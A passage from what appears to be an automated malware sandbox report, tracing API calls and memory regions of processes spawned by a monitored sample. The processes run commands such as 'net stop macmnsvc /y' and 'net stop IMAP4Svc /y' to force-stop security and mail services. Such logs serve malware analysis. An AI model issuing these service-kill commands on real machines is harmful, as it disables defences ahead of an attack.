"pagefile_0x0000000000030000" filename = "" Region: id = 5747 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5748 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5749 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5750 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5751 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5752 start_va = 0xffd10000 end_va = 0xffd42fff entry_point = 0xffd10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5753 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5754 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5755 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 5756 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5757 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 5758 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5759 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5760 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5761 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5762 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5763 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5764 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5765 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5766 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5767 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5768 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5769 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5770 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5771 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5772 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5773 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5774 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5775 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5776 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5777 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5778 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5779 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5780 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5781 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5782 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5801 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 530 os_tid = 0xd00 [0097.393] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaf0 | out: lpSystemTimeAsFileTime=0x1afaf0*(dwLowDateTime=0xef392c10, dwHighDateTime=0x1d48689)) [0097.393] GetCurrentProcessId () returned 0xff4 [0097.393] GetCurrentThreadId () returned 0xd00 [0097.393] GetTickCount () returned 0x2225e [0097.393] QueryPerformanceCounter (in: lpPerformanceCount=0x1afaf8 | out: lpPerformanceCount=0x1afaf8*=1814431100000) returned 1 [0097.394] GetModuleHandleW (lpModuleName=0x0) returned 0xffd10000 [0097.394] __set_app_type (_Type=0x1) [0097.394] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd29c9c) returned 0x0 [0097.394] __getmainargs (in: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788, _DoWildCard=0, _StartInfo=0xffd3479c | out: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788) returned 0 [0097.395] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.395] GetConsoleOutputCP () returned 0x1b5 [0097.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffd3cec0 | out: lpCPInfo=0xffd3cec0) returned 1 [0097.535] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0097.537] sprintf_s (in: _DstBuf=0x1afa98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0097.537] setlocale (category=0, locale=".437") returned="English_United States.437" [0097.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.538] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.538] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0097.538] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af830, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0097.539] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0097.539] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa88 | out: Buffer=0x1afa88*=0x364d50) returned 0x0 [0097.539] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa88 | out: Buffer=0x1afa88*=0x36c100) returned 0x0 [0097.539] _fileno (_File=0x7fefdba2a80) returned 0 [0097.539] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0097.539] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0097.539] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0097.539] _wcsicmp (_String1="config", _String2="stop") returned -16 [0097.539] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0097.539] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0097.539] _wcsicmp (_String1="file", _String2="stop") returned -13 [0097.539] _wcsicmp (_String1="files", _String2="stop") returned -13 [0097.539] _wcsicmp (_String1="group", _String2="stop") returned -12 [0097.539] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0097.539] _wcsicmp (_String1="help", _String2="stop") returned -11 [0097.539] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0097.539] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0097.539] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0097.539] _wcsicmp (_String1="session", _String2="stop") returned -15 [0097.539] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0097.539] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0097.540] _wcsicmp (_String1="share", _String2="stop") returned -12 [0097.540] _wcsicmp (_String1="start", _String2="stop") returned -14 [0097.540] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0097.540] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0097.540] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0097.540] _wcsicmp (_String1="accounts", _String2="EsgShKernel") returned -4 [0097.540] _wcsicmp (_String1="computer", _String2="EsgShKernel") returned -2 [0097.540] _wcsicmp (_String1="config", _String2="EsgShKernel") returned -2 [0097.540] _wcsicmp (_String1="continue", _String2="EsgShKernel") returned -2 [0097.540] _wcsicmp (_String1="cont", _String2="EsgShKernel") returned -2 [0097.540] _wcsicmp (_String1="file", _String2="EsgShKernel") returned 1 [0097.540] _wcsicmp (_String1="files", _String2="EsgShKernel") returned 1 [0097.540] _wcsicmp (_String1="group", _String2="EsgShKernel") returned 2 [0097.540] _wcsicmp (_String1="groups", _String2="EsgShKernel") returned 2 [0097.540] _wcsicmp (_String1="help", _String2="EsgShKernel") returned 3 [0097.540] _wcsicmp (_String1="helpmsg", _String2="EsgShKernel") returned 3 [0097.540] _wcsicmp (_String1="localgroup", _String2="EsgShKernel") returned 7 [0097.540] _wcsicmp (_String1="pause", _String2="EsgShKernel") returned 11 [0097.540] _wcsicmp (_String1="session", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="sessions", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="sess", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="share", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="start", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="stats", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="statistics", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="stop", _String2="EsgShKernel") returned 14 [0097.540] _wcsicmp (_String1="time", _String2="EsgShKernel") returned 15 [0097.540] _wcsicmp (_String1="user", _String2="EsgShKernel") returned 16 [0097.540] _wcsicmp (_String1="users", _String2="EsgShKernel") returned 16 [0097.540] _wcsicmp (_String1="msg", _String2="EsgShKernel") returned 8 [0097.540] _wcsicmp (_String1="messenger", _String2="EsgShKernel") returned 8 [0097.540] _wcsicmp (_String1="receiver", _String2="EsgShKernel") returned 13 [0097.540] _wcsicmp (_String1="rcv", _String2="EsgShKernel") returned 13 [0097.541] _wcsicmp (_String1="netpopup", _String2="EsgShKernel") returned 9 [0097.541] _wcsicmp (_String1="redirector", _String2="EsgShKernel") returned 13 [0097.541] _wcsicmp (_String1="redir", _String2="EsgShKernel") returned 13 [0097.541] _wcsicmp (_String1="rdr", _String2="EsgShKernel") returned 13 [0097.541] _wcsicmp (_String1="workstation", _String2="EsgShKernel") returned 18 [0097.541] _wcsicmp (_String1="work", _String2="EsgShKernel") returned 18 [0097.541] _wcsicmp (_String1="wksta", _String2="EsgShKernel") returned 18 [0097.541] _wcsicmp (_String1="prdr", _String2="EsgShKernel") returned 11 [0097.541] _wcsicmp (_String1="devrdr", _String2="EsgShKernel") returned -1 [0097.541] _wcsicmp (_String1="lanmanworkstation", _String2="EsgShKernel") returned 7 [0097.541] _wcsicmp (_String1="server", _String2="EsgShKernel") returned 14 [0097.541] _wcsicmp (_String1="svr", _String2="EsgShKernel") returned 14 [0097.541] _wcsicmp (_String1="srv", _String2="EsgShKernel") returned 14 [0097.541] _wcsicmp (_String1="lanmanserver", _String2="EsgShKernel") returned 7 [0097.541] _wcsicmp (_String1="alerter", _String2="EsgShKernel") returned -4 [0097.541] _wcsicmp (_String1="netlogon", _String2="EsgShKernel") returned 9 [0097.541] _wcsupr (in: _String="EsgShKernel" | out: _String="ESGSHKERNEL") returned="ESGSHKERNEL" [0097.541] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36ce10 [0097.545] GetServiceKeyNameW (in: hSCManager=0x36ce10, lpDisplayName="ESGSHKERNEL", lpServiceName=0xffd35750, lpcchBuffer=0x1af9a8 | out: lpServiceName="", lpcchBuffer=0x1af9a8) returned 0 [0097.546] _wcsicmp (_String1="msg", _String2="ESGSHKERNEL") returned 8 [0097.546] _wcsicmp (_String1="messenger", _String2="ESGSHKERNEL") returned 8 [0097.546] _wcsicmp (_String1="receiver", _String2="ESGSHKERNEL") returned 13 [0097.546] _wcsicmp (_String1="rcv", _String2="ESGSHKERNEL") returned 13 [0097.547] _wcsicmp (_String1="redirector", _String2="ESGSHKERNEL") returned 13 [0097.547] _wcsicmp (_String1="redir", _String2="ESGSHKERNEL") returned 13 [0097.547] _wcsicmp (_String1="rdr", _String2="ESGSHKERNEL") returned 13 [0097.547] _wcsicmp (_String1="workstation", _String2="ESGSHKERNEL") returned 18 [0097.547] _wcsicmp (_String1="work", _String2="ESGSHKERNEL") returned 18 [0097.547] _wcsicmp (_String1="wksta", _String2="ESGSHKERNEL") returned 18 [0097.547] _wcsicmp (_String1="prdr", _String2="ESGSHKERNEL") returned 11 [0097.547] _wcsicmp (_String1="devrdr", _String2="ESGSHKERNEL") returned -1 [0097.547] _wcsicmp (_String1="lanmanworkstation", _String2="ESGSHKERNEL") returned 7 [0097.547] _wcsicmp (_String1="server", _String2="ESGSHKERNEL") returned 14 [0097.547] _wcsicmp (_String1="svr", _String2="ESGSHKERNEL") returned 14 [0097.547] _wcsicmp (_String1="srv", _String2="ESGSHKERNEL") returned 14 [0097.547] _wcsicmp (_String1="lanmanserver", _String2="ESGSHKERNEL") returned 7 [0097.547] _wcsicmp (_String1="alerter", _String2="ESGSHKERNEL") returned -4 [0097.547] _wcsicmp (_String1="netlogon", _String2="ESGSHKERNEL") returned 9 [0097.547] NetServiceControl (in: servername=0x0, service="ESGSHKERNEL", opcode=0x0, arg=0x0, bufptr=0x1af9b0 | out: bufptr=0x1af9b0) returned 0x889 [0097.548] wcscpy_s (in: _Destination=0xffd380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0097.548] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0097.549] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0097.550] GetFileType (hFile=0xb) returned 0x2 [0097.550] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af878 | out: lpMode=0x1af878) returned 1 [0097.551] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af870, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x1af870*=0x1e) returned 1 [0097.551] GetFileType (hFile=0xb) returned 0x2 [0097.551] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af878 | out: lpMode=0x1af878) returned 1 [0097.551] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af870, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x1af870*=0x2) returned 1 [0097.552] _ultow (in: _Dest=0x889, _Radix=1767648 | out: _Dest=0x889) returned="2185" [0097.552] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0097.552] GetFileType (hFile=0xb) returned 0x2 [0097.552] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af878 | out: lpMode=0x1af878) returned 1 [0097.552] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af870, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x1af870*=0x34) returned 1 [0097.553] GetFileType (hFile=0xb) returned 0x2 [0097.553] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af878 | out: lpMode=0x1af878) returned 1 [0097.553] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af870, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x1af870*=0x2) returned 1 [0097.553] NetApiBufferFree (Buffer=0x364d50) returned 0x0 [0097.554] NetApiBufferFree (Buffer=0x36c100) returned 0x0 [0097.554] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0097.554] exit (_Code=2) Process: id = "122" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5fb33000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop IMAP4Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5783 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5784 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5785 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5786 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5787 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5788 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5789 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5790 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5791 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5792 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5793 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5794 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5795 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5796 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5797 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5817 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5818 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5819 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5820 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5821 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5822 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5823 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5824 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5825 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5826 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5827 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5828 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5829 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5830 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5831 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5832 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5833 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5834 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5835 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5836 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 531 os_tid = 0xf24 Process: id = "123" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x60753000" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop macmnsvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5802 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5803 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5804 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5805 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5806 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5807 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5808 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5809 start_va = 0xff5a0000 end_va = 0xff5bbfff 